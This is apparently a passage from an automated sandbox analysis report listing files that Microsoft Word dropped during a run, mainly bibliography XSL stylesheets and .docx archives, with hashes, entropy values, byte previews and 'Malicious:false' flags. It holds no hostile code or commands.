                            Size (bytes):296658
                            Entropy (8bit):5.000002997029767
                            Encrypted:false
                            SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                            MD5:9AC6DE7B629A4A802A41F93DB2C49747
                            SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                            SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                            SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):268317
                            Entropy (8bit):5.05419861997223
                            Encrypted:false
                            SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                            MD5:51D32EE5BC7AB811041F799652D26E04
                            SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                            SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                            SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):255948
                            Entropy (8bit):5.103631650117028
                            Encrypted:false
                            SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                            MD5:9888A214D362470A6189DEFF775BE139
                            SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                            SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                            SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):251032
                            Entropy (8bit):5.102652100491927
                            Encrypted:false
                            SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                            MD5:F425D8C274A8571B625EE66A8CE60287
                            SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                            SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                            SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):284415
                            Entropy (8bit):5.00549404077789
                            Encrypted:false
                            SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                            MD5:33A829B4893044E1851725F4DAF20271
                            SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                            SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                            SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):294178
                            Entropy (8bit):4.977758311135714
                            Encrypted:false
                            SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                            MD5:0C9731C90DD24ED5CA6AE283741078D0
                            SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                            SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                            SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):270198
                            Entropy (8bit):5.073814698282113
                            Encrypted:false
                            SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                            MD5:FF0E07EFF1333CDF9FC2523D323DD654
                            SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                            SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                            SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):217137
                            Entropy (8bit):5.068335381017074
                            Encrypted:false
                            SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                            MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                            SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                            SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                            SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):254875
                            Entropy (8bit):5.003842588822783
                            Encrypted:false
                            SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                            MD5:377B3E355414466F3E3861BCE1844976
                            SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                            SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                            SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):344303
                            Entropy (8bit):5.023195898304535
                            Encrypted:false
                            SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                            MD5:F079EC5E2CCB9CD4529673BCDFB90486
                            SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                            SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                            SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):250983
                            Entropy (8bit):5.057714239438731
                            Encrypted:false
                            SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                            MD5:F883B260A8D67082EA895C14BF56DD56
                            SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                            SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                            SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):51826
                            Entropy (8bit):5.541375256745271
                            Encrypted:false
                            SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                            MD5:2AB22AC99ACFA8A82742E774323C0DBD
                            SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                            SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                            SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                            Malicious:false
                            Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):47296
                            Entropy (8bit):6.42327948041841
                            Encrypted:false
                            SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                            MD5:5A53F55DD7DA8F10A8C0E711F548B335
                            SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                            SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                            SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                            Malicious:false
                            Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):34415
                            Entropy (8bit):7.352974342178997
                            Encrypted:false
                            SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                            MD5:7CDFFC23FB85AD5737452762FA36AAA0
                            SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                            SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                            SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                            Malicious:false
                            Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):3465076
                            Entropy (8bit):7.898517227646252
                            Encrypted:false
                            SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                            MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                            SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                            SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                            SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                            Malicious:false
                            Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):19356
                            Entropy (8bit):7.469032035010783
                            Encrypted:false
                            SSDEEP:384:Jrt+BNxt/ZtNNU1CadKLXjdMJMP8jjnOSYPWyQq9THHo:VAxllNWWXdR+yQ2o
                            MD5:76D7A4E479B7B89C3FB5F75480B9A004
                            SHA1:58D448887663F8E2287E1A29702C06A4EE78DB43
                            SHA-256:3139197A9D8BDEE5F474834C7D6AAEC35F9B3E39ACE3E316C680927C60C083A5
                            SHA-512:B9CBB4E02F5C744C4C4E3CA678865652F18E8A6085C130B3897697816D572C0C10BD691332EB0E7FE658F68FDCFB2354C667082B00B48357DA8F7C1E428E1412
                            Malicious:false
                            Preview:PK..........!.Q3.p............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ......J..0....K......H...R*.D.g..3.H....M!`.l.....J.j;*...>.b.Fa...B....wz...<`F..K6.._s.r.F`.<X.T....7....U.._t:.\:...<&....A%&:f.9..H.hd..*1y.Lx.k)".........e..k.g.....)....&......A...3..WNN.U..e...<....'4(.....x.....nh.t.....p7..j..s...I@.w6.X..C.Tp...r+..^..F.N...".az...h.[!F.!...g...i"...C..n9.~l...3.....H..V..9.2.,)s..GZD..mo6M..a.!...q$.......O..r-.........PK..........!.........N......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:modified
                            Size (bytes):162
                            Entropy (8bit):3.5978985168719513
                            Encrypted:false
                            SSDEEP:3:KVGl/lilKlRAGl/t6lFXsaalalV/w/C3W7e1vqPXUJwln:KVy/4KDZwlF8vAVx3HvqPXUa
                            MD5:BFEAF293D21982A6CC6D9F30AA3B3467
                            SHA1:34AE139BE948322D64523360362E8B087D2274F4
                            SHA-256:E4AF4BB299A6C3A1764836C35506D145DF7B073F1D566F441FB67205D945841F
                            SHA-512:CE618DE5775C6B8201165DD6FECFAD23950E8D126BF4F1409C31CBCC8FAFB514893AF140325E68F2BF5E6A395F92745108AB381E894CA1363B943340C697CBA9
                            Malicious:false
                            Preview:.user..................................................j.o.n.e.s..............P....%.$0..Xz.kM......... j.....P....%.(A....%..O...O..M............O...P..h0..(A..
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):19356
                            Entropy (8bit):7.469032035010783
                            Encrypted:false
                            SSDEEP:384:Jrt+BNxt/ZtNNU1CadKLXjdMJMP8jjnOSYPWyQq9THHo:VAxllNWWXdR+yQ2o
                            MD5:76D7A4E479B7B89C3FB5F75480B9A004
                            SHA1:58D448887663F8E2287E1A29702C06A4EE78DB43
                            SHA-256:3139197A9D8BDEE5F474834C7D6AAEC35F9B3E39ACE3E316C680927C60C083A5
                            SHA-512:B9CBB4E02F5C744C4C4E3CA678865652F18E8A6085C130B3897697816D572C0C10BD691332EB0E7FE658F68FDCFB2354C667082B00B48357DA8F7C1E428E1412
                            Malicious:false
                            Preview:PK..........!.Q3.p............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ......J..0....K......H...R*.D.g..3.H....M!`.l.....J.j;*...>.b.Fa...B....wz...<`F..K6.._s.r.F`.<X.T....7....U.._t:.\:...<&....A%&:f.9..H.hd..*1y.Lx.k)".........e..k.g.....)....&......A...3..WNN.U..e...<....'4(.....x.....nh.t.....p7..j..s...I@.w6.X..C.Tp...r+..^..F.N...".az...h.[!F.!...g...i"...C..n9.~l...3.....H..V..9.2.,)s..GZD..mo6M..a.!...q$.......O..r-.........PK..........!.........N......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):12
                            Entropy (8bit):0.41381685030363374
                            Encrypted:false
                            SSDEEP:3:/l:
                            MD5:E4A1661C2C886EBB688DEC494532431C
                            SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                            SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
